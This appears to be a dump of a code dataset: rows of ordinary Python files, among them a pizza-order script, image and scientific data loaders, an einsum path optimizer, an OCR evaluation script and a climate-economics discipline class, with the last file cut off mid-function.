seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
29779893290 | """
Take input N orders and output a sorted list of customers along with their orders.
Each order is a string containing "Customer - Pizza Name - Quantity" in the given format.
"""
def make_orders(ord_count, orders):
for i_ord in range(1, ord_count + 1):
order = input(f'{i_ord}-ый заказ: ').split()
name, pizza, num = order[0], order[1], int(order[2])
check = orders.setdefault(
name, {pizza : []}
).setdefault(pizza, [])
orders[name][pizza].append(num)
print()
def dict_print(to_view):
for name in sorted(to_view.keys()):
print(f'{name} :')
for i_dict in sorted(to_view[name]):
print(f'\t{i_dict} : {sum(to_view[name][i_dict])}')
orders_history = dict() # orders dictionary init
orders_count = int(input('Введите количество заказов: '))
make_orders(orders_count, orders_history) # get and add order to dict
dict_print(orders_history) # print of orders dictionary
| AfoninSV/python_scripts | pizza_orders.py | pizza_orders.py | py | 1,002 | python | en | code | 0 | github-code | 36 |
12365029657 | import pandas as pd
import numpy as np
import pylab
from PIL import Image
from PIL import ImageOps
from conv_net.dataset import BaseDataset
from os import listdir
from os.path import isfile, join
class Dataset(BaseDataset):
def read_validation_set(self):
return self._read_image_set("validation_set_resize", "validationLabels.csv")
def read_training_set(self):
return self._read_image_set("train_set_resize", "trainLabels.csv")
def _read_image_set(self, directory_path, label_path):
labels = self._read_labels(label_path)
X = []
y = []
for name, level, index in zip(labels['image'], labels['level'], range(self._training_set_size)):
target = self._label_to_vector(level)
path = directory_path + "/" + name + ".jpeg"
image = self._read_image(path)
X.append(image)
y.append(target)
return self._return_training_set(X,y)
def _return_training_set(self, X, y):
y = np.array(y)
X = self._reshape_input_set(X)
return X,y
def _reshape_input_set(self, X):
X = np.array(X)
X = X.astype(np.float32)
if not self._flatten:
X = X.reshape(-1, 1, self._height, self._width)
return X
def _label_to_vector(self, label):
vector = np.array([0.0]*5)
vector[label] = 1.0
vector = vector.astype(np.float32)
return vector
def _read_labels(self, filename):
labels = pd.read_csv(filename)
return labels
def read_test_set(self, directory, test_set_size=100000):
files = self._list_files_in(directory)
X = []
image_names = []
for image_name, index in zip(files, range(test_set_size)):
image_path = directory + "/" + image_name
image_name = image_name.replace(".jpeg","")
image = self._read_image(image_path)
X.append(image)
image_names.append(image_name)
return self._reshape_input_set(X), image_names
def _list_files_in(self, directory):
return [ f for f in listdir(directory) if isfile(join(directory,f)) ]
def _test_set_generator(self):
for index in xrange(self._test_set_size):
try:
left_name, left, right_name, right = self._read_file_pair("test_set_resize", index)
except IOError as e:
continue
yield left_name, left, right_name, right
| gozmo/diabetes | read_files.py | read_files.py | py | 2,480 | python | en | code | 0 | github-code | 36 |
72152970345 | import os, glob, math
import numpy as np
import tensorflow as tf
from PIL import Image
from myutils_tf import bwutils
def save_4ch_to_3ch(path_pixel_shift):
print(path_pixel_shift)
files = glob.glob(os.path.join(path_pixel_shift, '*.npy'))
# print(files)
for idx, file in enumerate(files):
if '3ch' not in file:
arr = np.load(file)
arr_3ch = arr[:,:,(0,1,3)]
file_new = file[:-4] + '_3ch.npy'
np.save(file_new, arr_3ch)
def get_model(model_name, model_sig):
base_path = os.path.join('model_dir', 'checkpoint')
structure_path = os.path.join(base_path, model_name + '_model_structure.h5')
ckpt_path = os.path.join(base_path, model_name + '_' + model_sig)
print(structure_path, '\n', ckpt_path)
# load model structure
model = tf.keras.models.load_model(structure_path)
# find latest weights and load
ckpts = glob.glob(os.path.join(ckpt_path, '*.h5'))
ckpts.sort()
ckpt = ckpts[-1]
model.load_weights(ckpt)
# print(ckpt)
# model.summary()
return model
def normalize1_and_gamma(arr, bits=16, beta=1/2.2):
arr = arr / (2**bits -1) # (0, 1)
arr = arr ** beta # (0, 1)
return arr
def main():
# model name
model_name = 'unetv2'
model_name = 'unet'
# model sig
model_sig = 'noise3'
# get model
model = get_model(model_name, model_sig)
# test data
PATH_PIXELSHIFT = 'C:/Users/AI38/datasets/pixelshfit/PixelShift200_test'
files = glob.glob(os.path.join(PATH_PIXELSHIFT, '*_3ch.npy'))
pad_size = 32
patch_size = 128
# shape = np.load(files[0]).shape
# height, width, channels = np.load(files[0]).shape
# npatches_y, npatches_x = math.ceil(shape[0]/patch_size), math.ceil(shape[1]/patch_size)
# print(arr_pred.shape)
for idx, file in enumerate(files):
arr = np.load(file) # (0, 65535)
# arr = arr / (2**16 -1) # (0, 1)
# arr = arr ** (1/2.2) # (0, 1)
arr = normalize1_and_gamma(arr)
img_arr = Image.fromarray( (arr*255).astype(np.uint8) )
img_arr.save(os.path.join(PATH_PIXELSHIFT, f'inf_ref_%02d.png'%(idx+1)))
print('arr.shape', arr.shape)
arr = np.pad(arr, ((pad_size, pad_size), (pad_size, pad_size),(0, 0)), 'symmetric')
print('arr.shape', arr.shape)
height, width, channels = arr.shape
npatches_y = math.ceil((height+2*pad_size) / (patch_size-2*pad_size))
npatches_x = math.ceil((width +2*pad_size) / (patch_size-2*pad_size))
arr_pred = np.zeros_like(arr)
print(idx, file, arr.shape, arr_pred.shape)
# exit()
cnt=0
tcnt= npatches_x*npatches_y
for idx_y in range(npatches_y):
for idx_x in range(npatches_x):
if(cnt%10==0):
print(f'{cnt} / {tcnt}')
cnt+=1
sy = idx_y * (patch_size-2*pad_size)
ey = sy + patch_size
sx = idx_x * (patch_size-2*pad_size)
ex = sx + patch_size
if ey >= height:
ey = height-1
sy = height-patch_size-1
if ex >= width:
ex = width-1
sx = width-patch_size-1
arr_patch = arr[sy:ey, sx:ex,:]
print(np.amin(arr_patch), np.amax(arr_patch) )
# pre-process
arr_patch = arr_patch**(1/2.2)
arr_patch = (arr_patch*2) -1 # (0, 1) -> (-1, 1)
# prediction
pred = model.predict(arr_patch[np.newaxis,...])
print(pred.shape)
# post-process
arr_pred[sy+pad_size:ey-pad_size, sx+pad_size:ex-pad_size, :] = \
(pred[0, pad_size:-pad_size, pad_size:-pad_size, :]+1)/2 # (-1, 1) -> (0, 1)
# print(np.amin(arr_patch), np.amax(arr_patch), np.amin(arr_pred), np.amax(arr_pred))
# exit()
# arr_pred.astype(np.uint8)
arr_pred = arr_pred[pad_size:-pad_size, pad_size:-pad_size, :]
img_pred = Image.fromarray((arr_pred*255).astype(np.uint8))
# name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d.png'%(idx+1))
name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d_gamma.png'%(idx+1))
img_pred.save(name)
print(np.amin(img_pred), np.amax(img_pred), np.amin(arr_pred.astype(np.uint8)), np.amax(arr_pred.astype(np.uint8)))
exit()
if __name__ == '__main__':
main() | samsungexpert/snu | myinference_srgb2raw_tf.py | myinference_srgb2raw_tf.py | py | 4,612 | python | en | code | 1 | github-code | 36 |
20510618819 | # Author: Vlad Niculae <vlad@vene.ro>
# License: GNU LGPL v3
import numpy as np
from numpy.testing import assert_array_equal
from ad3 import factor_graph as fg
def test_sequence_dense():
n_states = 3
transition = np.eye(n_states).ravel()
graph = fg.PFactorGraph()
vars_expected = [0, 1, None, None, 1]
variables = [graph.create_multi_variable(n_states) for _ in vars_expected]
for prev, curr in zip(variables, variables[1:]):
graph.create_factor_dense([prev, curr], transition)
for var, ix in zip(variables, vars_expected):
if ix is not None:
var.set_log_potential(ix, 1)
value, marginals, additionals, status = graph.solve()
# 3 points for "observed" values, 3 points for consecutive equal vals
assert value == 6
expected = [0, 1, 1, 1, 1]
obtained = np.array(marginals).reshape(5, -1).argmax(axis=1)
assert_array_equal(expected, obtained)
| andre-martins/AD3 | python/ad3/tests/test_sequence.py | test_sequence.py | py | 929 | python | en | code | 68 | github-code | 36 |
75104144745 | from math import factorial
def count_differences(adapters):
one_count, three_count = 0, 0
current_rating = 0
adapters.sort()
for x in set(adapters):
if x - current_rating == 1:
one_count += 1
elif x - current_rating == 3:
three_count += 1
current_rating = x
return one_count * (three_count + 1)
def count_arrangements(adapters):
adapters.sort()
complete_list = [0] + list(set(adapters)) + [adapters[-1] + 3]
times = 1
left, right = 0, 0
while left < len(complete_list) - 1 and right < len(complete_list) - 1:
while complete_list[right + 1] - complete_list[right] == 1:
right += 1
times *= count_combination(complete_list[left:right+1])
right += 1
left = right
return times
def count_combination(adapters):
if len(adapters) == 3:
return 2
elif len(adapters) > 3:
# full list + (full list minus 1 of the middle numbers) + (full list minus combination of any 2 middle numbers)
result = 1 + len(adapters) - 2 + int(factorial(len(adapters) - 2) / 2)
return result
return 1
with open("data.txt") as file:
adapters = [int(i) for i in file.read().splitlines()]
print(count_differences(adapters))
print(count_arrangements(adapters)) | itsmeichigo/Playgrounds | AdventOfCode2020/Day10/day10.py | day10.py | py | 1,320 | python | en | code | 0 | github-code | 36 |
4705074588 | import functools
import pandas as pd
import numpy as np
import periodictable as pt
from pathlib import Path
from tinydb import TinyDB, Query
from .transform import formula_to_elemental
from ..util.meta import pyrolite_datafolder
from ..util.database import _list_tindyb_unique_values
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
logger = logging.getLogger(__name__)
__dbpath__ = pyrolite_datafolder(subfolder="mineral") / "mindb.json"
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_groups():
"""
List the mineral groups present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("group", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_minerals():
"""
List the minerals present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("name", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_formulae():
"""
List the mineral formulae present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("formula", dbpath=__dbpath__)
def get_mineral(name="", dbpath=None):
"""
Get a specific mineral from the database.
Parameters
------------
name : :class:`str`
Name of the desired mineral.
dbpath : :class:`pathlib.Path`, :class:`str`
Optional overriding of the default database path.
Returns
--------
:class:`pd.Series`
"""
if dbpath is None:
dbpath = __dbpath__
assert name in list_minerals()
with TinyDB(str(dbpath)) as db:
out = db.get(Query().name == name)
return pd.Series(out)
def parse_composition(composition, drop_zeros=True):
"""
Parse a composition reference and return the composiiton as a :class:`~pandas.Series`
Parameters
-----------
composition : :class:`str` | :class:`periodictable.formulas.Formula`
"""
mnrl = None
if composition in list_minerals():
mnrl = get_mineral(composition)
try: # formulae
form = pt.formula(composition)
mnrl = pd.Series(formula_to_elemental(form))
# could also check for formulae in the database, using f.atoms
except:
pass
assert mnrl is not None
if drop_zeros:
mnrl = mnrl[mnrl != 0]
return mnrl
def get_mineral_group(group=""):
"""
Extract a mineral group from the database.
Parameters
-----------
group : :class:`str`
Group to extract from the mineral database.
Returns
---------
:class:`pandas.DataFrame`
Dataframe of group members and compositions.
"""
assert group in list_groups()
with TinyDB(str(__dbpath__)) as db:
grp = db.search(Query().group == group)
df = pd.DataFrame(grp)
meta, chem = (
["name", "formula"],
[i for i in df.columns if i not in ["name", "formula", "group"]],
)
df = df.reindex(columns=meta + chem)
df.loc[:, chem] = df.loc[:, chem].apply(pd.to_numeric)
df = df.loc[:, (df != 0).any(axis=0)] # remove zero-only columns
return df
def update_database(path=None, **kwargs):
"""
Update the mineral composition database.
Parameters
-----------
path : :class:`str` | :class:`pathlib.Path`
The desired filepath for the JSON database.
Notes
------
This will take the 'mins.csv' file from the mineral pyrolite data folder
and construct a document-based JSON database.
"""
mindf = pd.read_csv(pyrolite_datafolder(subfolder="mineral") / "mins.csv")
mindf = mindf.reindex(
columns=mindf.columns.tolist()
+ [str(a) for a in pt.formula(" ".join(mindf.formula.to_list())).atoms]
)
for ix in mindf.index: # add elemental compositions
el = parse_composition(pt.formula(mindf.loc[ix, "formula"]))
mindf.loc[ix, el.index] = el
mindf = mindf.fillna(0.0)
if path is None:
path = __dbpath__
path = Path(path).with_suffix(".json")
# name group formula composition
with TinyDB(str(path)) as db:
db.purge()
for k, v in mindf.T.to_dict().items():
db.insert(v)
db.close()
| skerryvore/pyrolite | pyrolite/mineral/mindb.py | mindb.py | py | 4,362 | python | en | code | null | github-code | 36 |
26716825256 | """
Support for random optimizers, including the random-greedy path.
"""
import functools
import heapq
import math
import numbers
import time
from collections import deque
from random import choices as random_choices
from random import seed as random_seed
from typing import Any, Dict, Generator, Iterable, List, Optional, Tuple
from . import helpers, paths
from .typing import ArrayIndexType, ArrayType, PathType
__all__ = ["RandomGreedy", "random_greedy", "random_greedy_128"]
class RandomOptimizer(paths.PathOptimizer):
"""Base class for running any random path finder that benefits
from repeated calling, possibly in a parallel fashion. Custom random
optimizers should subclass this, and the `setup` method should be
implemented with the following signature:
```python
def setup(self, inputs, output, size_dict):
# custom preparation here ...
return trial_fn, trial_args
```
Where `trial_fn` itself should have the signature::
```python
def trial_fn(r, *trial_args):
# custom computation of path here
return ssa_path, cost, size
```
Where `r` is the run number and could for example be used to seed a
random number generator. See `RandomGreedy` for an example.
**Parameters:**
- **max_repeats** - *(int, optional)* The maximum number of repeat trials to have.
- **max_time** - *(float, optional)* The maximum amount of time to run the algorithm for.
- **minimize** - *({'flops', 'size'}, optional)* Whether to favour paths that minimize the total estimated flop-count or
the size of the largest intermediate created.
- **parallel** - *({bool, int, or executor-pool like}, optional)* Whether to parallelize the random trials, by default `False`. If
`True`, use a `concurrent.futures.ProcessPoolExecutor` with the same
number of processes as cores. If an integer is specified, use that many
processes instead. Finally, you can supply a custom executor-pool which
should have an API matching that of the python 3 standard library
module `concurrent.futures`. Namely, a `submit` method that returns
`Future` objects, themselves with `result` and `cancel` methods.
- **pre_dispatch** - *(int, optional)* If running in parallel, how many jobs to pre-dispatch so as to avoid
submitting all jobs at once. Should also be more than twice the number
of workers to avoid under-subscription. Default: 128.
**Attributes:**
- **path** - *(list[tuple[int]])* The best path found so far.
- **costs** - *(list[int])* The list of each trial's costs found so far.
- **sizes** - *(list[int])* The list of each trial's largest intermediate size so far.
"""
def __init__(
self,
max_repeats: int = 32,
max_time: Optional[float] = None,
minimize: str = "flops",
parallel: bool = False,
pre_dispatch: int = 128,
):
if minimize not in ("flops", "size"):
raise ValueError("`minimize` should be one of {'flops', 'size'}.")
self.max_repeats = max_repeats
self.max_time = max_time
self.minimize = minimize
self.better = paths.get_better_fn(minimize)
self._parallel = False
self.parallel = parallel
self.pre_dispatch = pre_dispatch
self.costs: List[int] = []
self.sizes: List[int] = []
self.best: Dict[str, Any] = {"flops": float("inf"), "size": float("inf")}
self._repeats_start = 0
self._executor: Any
self._futures: Any
@property
def path(self) -> PathType:
"""The best path found so far."""
return paths.ssa_to_linear(self.best["ssa_path"])
@property
def parallel(self) -> bool:
return self._parallel
@parallel.setter
def parallel(self, parallel: bool) -> None:
# shutdown any previous executor if we are managing it
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
self._parallel = parallel
self._managing_executor = False
if parallel is False:
self._executor = None
return
if parallel is True:
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor()
self._managing_executor = True
return
if isinstance(parallel, numbers.Number):
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor(parallel)
self._managing_executor = True
return
# assume a pool-executor has been supplied
self._executor = parallel
def _gen_results_parallel(self, repeats: Iterable[int], trial_fn: Any, args: Any) -> Generator[Any, None, None]:
"""Lazily generate results from an executor without submitting all jobs at once."""
self._futures = deque()
# the idea here is to submit at least ``pre_dispatch`` jobs *before* we
# yield any results, then do both in tandem, before draining the queue
for r in repeats:
if len(self._futures) < self.pre_dispatch:
self._futures.append(self._executor.submit(trial_fn, r, *args))
continue
yield self._futures.popleft().result()
while self._futures:
yield self._futures.popleft().result()
def _cancel_futures(self) -> None:
if self._executor is not None:
for f in self._futures:
f.cancel()
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
raise NotImplementedError
def __call__(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
memory_limit: Optional[int] = None,
) -> PathType:
self._check_args_against_first_call(inputs, output, size_dict)
# start a timer?
if self.max_time is not None:
t0 = time.time()
trial_fn, trial_args = self.setup(inputs, output, size_dict)
r_start = self._repeats_start + len(self.costs)
r_stop = r_start + self.max_repeats
repeats = range(r_start, r_stop)
# create the trials lazily
if self._executor is not None:
trials = self._gen_results_parallel(repeats, trial_fn, trial_args)
else:
trials = (trial_fn(r, *trial_args) for r in repeats)
# assess the trials
for ssa_path, cost, size in trials:
# keep track of all costs and sizes
self.costs.append(cost)
self.sizes.append(size)
# check if we have found a new best
found_new_best = self.better(cost, size, self.best["flops"], self.best["size"])
if found_new_best:
self.best["flops"] = cost
self.best["size"] = size
self.best["ssa_path"] = ssa_path
# check if we have run out of time
if (self.max_time is not None) and (time.time() > t0 + self.max_time):
break
self._cancel_futures()
return self.path
def __del__(self):
# if we created the parallel pool-executor, shut it down
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
def thermal_chooser(queue, remaining, nbranch=8, temperature=1, rel_temperature=True):
"""A contraction 'chooser' that weights possible contractions using a
Boltzmann distribution. Explicitly, given costs `c_i` (with `c_0` the
smallest), the relative weights, `w_i`, are computed as:
$$w_i = exp( -(c_i - c_0) / temperature)$$
Additionally, if `rel_temperature` is set, scale `temperature` by
`abs(c_0)` to account for likely fluctuating cost magnitudes during the
course of a contraction.
**Parameters:**
- **queue** - *(list)* The heapified list of candidate contractions.
- **remaining** - *(dict[str, int])* Mapping of remaining inputs' indices to the ssa id.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the `temperature` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
**Returns:**
- **cost**
- **k1**
- **k2**
- **k3**
"""
n = 0
choices = []
while queue and n < nbranch:
cost, k1, k2, k12 = heapq.heappop(queue)
if k1 not in remaining or k2 not in remaining:
continue # candidate is obsolete
choices.append((cost, k1, k2, k12))
n += 1
if n == 0:
return None
if n == 1:
return choices[0]
costs = [choice[0][0] for choice in choices]
cmin = costs[0]
# adjust by the overall scale to account for fluctuating absolute costs
if rel_temperature:
temperature *= max(1, abs(cmin))
# compute relative probability for each potential contraction
if temperature == 0.0:
energies = [1 if c == cmin else 0 for c in costs]
else:
# shift by cmin for numerical reasons
energies = [math.exp(-(c - cmin) / temperature) for c in costs]
# randomly choose a contraction based on energies
(chosen,) = random_choices(range(n), weights=energies)
cost, k1, k2, k12 = choices.pop(chosen)
# put the other choice back in the heap
for other in choices:
heapq.heappush(queue, other)
return cost, k1, k2, k12
def ssa_path_compute_cost(
ssa_path: PathType,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[int, int]:
"""Compute the flops and max size of an ssa path."""
inputs = list(map(frozenset, inputs)) # type: ignore
output = frozenset(output)
remaining = set(range(len(inputs)))
total_cost = 0
max_size = 0
for i, j in ssa_path:
k12, flops12 = paths.calc_k12_flops(inputs, output, remaining, i, j, size_dict) # type: ignore
remaining.discard(i)
remaining.discard(j)
remaining.add(len(inputs))
inputs.append(k12)
total_cost += flops12
max_size = max(max_size, helpers.compute_size_by_dict(k12, size_dict))
return total_cost, max_size
def _trial_greedy_ssa_path_and_cost(
r: int,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
choose_fn: Any,
cost_fn: Any,
) -> Tuple[PathType, int, int]:
"""A single, repeatable, greedy trial run. **Returns:** ``ssa_path`` and cost."""
if r == 0:
# always start with the standard greedy approach
choose_fn = None
random_seed(r)
ssa_path = paths.ssa_greedy_optimize(inputs, output, size_dict, choose_fn, cost_fn)
cost, size = ssa_path_compute_cost(ssa_path, inputs, output, size_dict)
return ssa_path, cost, size
class RandomGreedy(RandomOptimizer):
"""
**Parameters:**
- **cost_fn** - *(callable, optional)* A function that returns a heuristic 'cost' of a potential contraction
with which to sort candidates. Should have signature
`cost_fn(size12, size1, size2, k12, k1, k2)`.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the ``temperature`` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction. If False, the
algorithm will end up branching when the absolute cost is low, but
stick to the 'greedy' path when the cost is high - this can also be
beneficial.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
- **kwargs** - Supplied to RandomOptimizer.
"""
def __init__(
self,
cost_fn: str = "memory-removed-jitter",
temperature: float = 1.0,
rel_temperature: bool = True,
nbranch: int = 8,
**kwargs: Any,
):
self.cost_fn = cost_fn
self.temperature = temperature
self.rel_temperature = rel_temperature
self.nbranch = nbranch
super().__init__(**kwargs)
@property
def choose_fn(self) -> Any:
"""The function that chooses which contraction to take - make this a
property so that ``temperature`` and ``nbranch`` etc. can be updated
between runs.
"""
if self.nbranch == 1:
return None
return functools.partial(
thermal_chooser,
temperature=self.temperature,
nbranch=self.nbranch,
rel_temperature=self.rel_temperature,
)
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
fn = _trial_greedy_ssa_path_and_cost
args = (inputs, output, size_dict, self.choose_fn, self.cost_fn)
return fn, args
def random_greedy(
inputs: List[ArrayIndexType],
output: ArrayIndexType,
idx_dict: Dict[str, int],
memory_limit: Optional[int] = None,
**optimizer_kwargs: Any,
) -> ArrayType:
""" """
optimizer = RandomGreedy(**optimizer_kwargs)
return optimizer(inputs, output, idx_dict, memory_limit)
random_greedy_128 = functools.partial(random_greedy, max_repeats=128)
| dgasmith/opt_einsum | opt_einsum/path_random.py | path_random.py | py | 14,478 | python | en | code | 764 | github-code | 36 |
74876486825 | t=int(input())
while(t):
t-=1
a=str(input())
n=len(a)
a=list(a)
if(n%2==1):
a1=a[0:n//2]
a2=a[n//2+1:n]
#print(a1,a2)
else:
a1=a[0:n//2]
a2=a[n//2:n]
#print(a1,a2)
a1.sort()
a2.sort()
if(a1==a2):
print("YES")
else:
print("NO")
| anirudhkannanvp/CODECHEF | Practice/LAPIN.py | LAPIN.py | py | 331 | python | en | code | 0 | github-code | 36 |
2796043458 | import argparse
import os
from glob import glob
import json
import jellyfish
from text_extraction import Rectangle, AUTHOR_LABEL, DESCRIPTION_LABEL
import re
import pandas as pd
from tqdm import tqdm
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input-folder", required=True, help="Folder with the json file")
ap.add_argument("-o", "--output-folder", required=True, help="Folder with the saved corrected json files")
args = ap.parse_args()
INPUT_FOLDER = args.input_folder
OUTPUT_FOLDER = args.output_folder
input_elements = sorted([os.path.basename(f) for f in glob(os.path.join(OUTPUT_FOLDER, '*.json'))])
def get_transcription(basename, groundtruth: bool):
saved_file = os.path.join(OUTPUT_FOLDER, basename)
if groundtruth:
with open(saved_file, 'r') as f:
return json.load(f)
else:
input_file = os.path.join(INPUT_FOLDER, basename)
rects = Rectangle.load_from_json(input_file)
return {
AUTHOR_LABEL: next((r.text for r in rects if r.label == AUTHOR_LABEL), ''),
DESCRIPTION_LABEL: next((r.text for r in rects if r.label == DESCRIPTION_LABEL), '')
}
def normalized_str(s):
s = s.lower()
s = re.sub(r"[,;\-\.\n\(\)']", ' ', s)
s = re.sub(' +', ' ', s)
return s.strip()
results = []
for basename in tqdm(input_elements):
gt_transcription = get_transcription(basename, groundtruth=True)
input_transcription = get_transcription(basename, groundtruth=False)
gt_author, gt_description = gt_transcription[AUTHOR_LABEL], gt_transcription[DESCRIPTION_LABEL]
extracted_author, extracted_description = input_transcription[AUTHOR_LABEL], input_transcription[DESCRIPTION_LABEL]
# print(gt_author, gt_description, extracted_author, extracted_description)
try:
results.append({
'basename': basename,
'author_error': jellyfish.damerau_levenshtein_distance(gt_author, extracted_author),
'description_error': jellyfish.damerau_levenshtein_distance(gt_description, extracted_description),
'author_len': len(gt_author),
'description_len': len(gt_description),
'author_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_author),
normalized_str(extracted_author)),
'description_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_description),
normalized_str(
extracted_description))
})
if jellyfish.damerau_levenshtein_distance(normalized_str(gt_author), normalized_str(extracted_author))>0:
print(gt_author, extracted_author)
except Exception:
print(basename)
df = pd.DataFrame.from_records(results)
print('CER (author) : {:.2f}'.format(100 * df.author_error.sum() / df.author_len.sum()))
print('CER (description) : {:.2f}'.format(100 * df.description_error.sum() / df.description_len.sum()))
print('CER (author, normalized) : {:.2f}'.format(100 * df.author_error_normalized.sum() / df.author_len.sum()))
print('CER (description, normalized) : {:.2f}'.format(
100 * df.description_error_normalized.sum() / df.description_len.sum()))
print('Perfect transcription (author) : {:.2f}'.format(100 * (df.author_error == 0).sum() / len(df)))
print('Perfect transcription (description) : {:.2f}'.format(100 * (df.description_error == 0).sum() / len(df)))
print('Perfect transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized == 0).sum() / len(df)))
print('Perfect transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized == 0).sum() / len(df)))
print('1-away transcription (author) : {:.2f}'.format(100 * (df.author_error <= 1).sum() / len(df)))
print('1-away transcription (description) : {:.2f}'.format(100 * (df.description_error <= 1).sum() / len(df)))
print('1-away transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized <= 1).sum() / len(df)))
print('1-away transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized <= 1).sum() / len(df)))
| paulguhennec/Cini-Project | Process-Images/ocr_evaluation.py | ocr_evaluation.py | py | 4,367 | python | en | code | null | github-code | 36 |
21333145497 | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from climateeconomics.core.core_witness.climateeco_discipline import ClimateEcoDiscipline
from climateeconomics.core.core_witness.macroeconomics_model import MacroEconomics
from sostrades_core.tools.post_processing.charts.two_axes_instanciated_chart import InstanciatedSeries, TwoAxesInstanciatedChart
from sostrades_core.tools.post_processing.charts.chart_filter import ChartFilter
import pandas as pd
import numpy as np
from copy import deepcopy
class InvestDiscipline(ClimateEcoDiscipline):
"Macroeconomics discipline for WITNESS"
# ontology information
_ontology_data = {
'label': 'WITNESS Investissement Model',
'type': 'Research',
'source': 'SoSTrades Project',
'validated': '',
'validated_by': 'SoSTrades Project',
'last_modification_date': '',
'category': '',
'definition': '',
'icon': '',
'version': '',
}
_maturity = 'Research'
years = np.arange(2020, 2101)
DESC_IN = {
'energy_investment_macro': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_witness'},
'energy_investment': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_energy_mix'},
'invest_norm': {'type': 'float', 'default': 10.0},
'formulation': {'type': 'string', 'default': 'objective', 'possile_values': ['objective', 'constraint']},
'max_difference': {'type': 'float', 'default': 1.0e-1},
}
DESC_OUT = {
'invest_objective': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_witness'},
'diff_norm': {'type': 'array'}
}
def run(self):
# Get inputs
inputs = self.get_sosdisc_inputs()
difference = np.linalg.norm(inputs['energy_investment_macro']['energy_investment'].values -
inputs['energy_investment']['energy_investment'].values) / inputs['invest_norm']
if inputs['formulation'] == 'objective':
invest_objective = difference
elif inputs['formulation'] == 'constraint':
invest_objective = inputs['max_difference'] - difference
# Store output data
dict_values = {'invest_objective': pd.DataFrame(
{'norm': [invest_objective]}),
'diff_norm': difference}
self.store_sos_outputs_values(dict_values)
def compute_sos_jacobian(self):
"""
Compute jacobian for each coupling variable
gradiant of coupling variable to compute
"""
inputs = self.get_sosdisc_inputs()
invest_objective = self.get_sosdisc_outputs(
'invest_objective')['norm'].values[0]
dinvestment = (inputs['energy_investment_macro']['energy_investment'].values -
inputs['energy_investment']['energy_investment'].values) / invest_objective / inputs['invest_norm']**2
self.set_partial_derivative_for_other_types(
('invest_objective', 'norm'), ('energy_investment_macro', 'energy_investment'), dinvestment) # Invest from T$ to G$
self.set_partial_derivative_for_other_types(
('invest_objective', 'norm'), ('energy_investment', 'energy_investment'), -dinvestment) # Invest from T$ to G$
def get_chart_filter_list(self):
# For the outputs, making a graph for tco vs year for each range and for specific
# value of ToT with a shift of five year between then
chart_filters = []
chart_list = ['Difference of investments']
# First filter to deal with the view : program or actor
chart_filters.append(ChartFilter(
'Charts', chart_list, chart_list, 'charts'))
return chart_filters
def get_post_processing_list(self, chart_filters=None):
# For the outputs, making a graph for tco vs year for each range and for specific
# value of ToT with a shift of five year between then
instanciated_charts = []
# Overload default value with chart filter
if chart_filters is not None:
for chart_filter in chart_filters:
if chart_filter.filter_key == 'charts':
chart_list = chart_filter.selected_values
if 'Difference of investments' in chart_list:
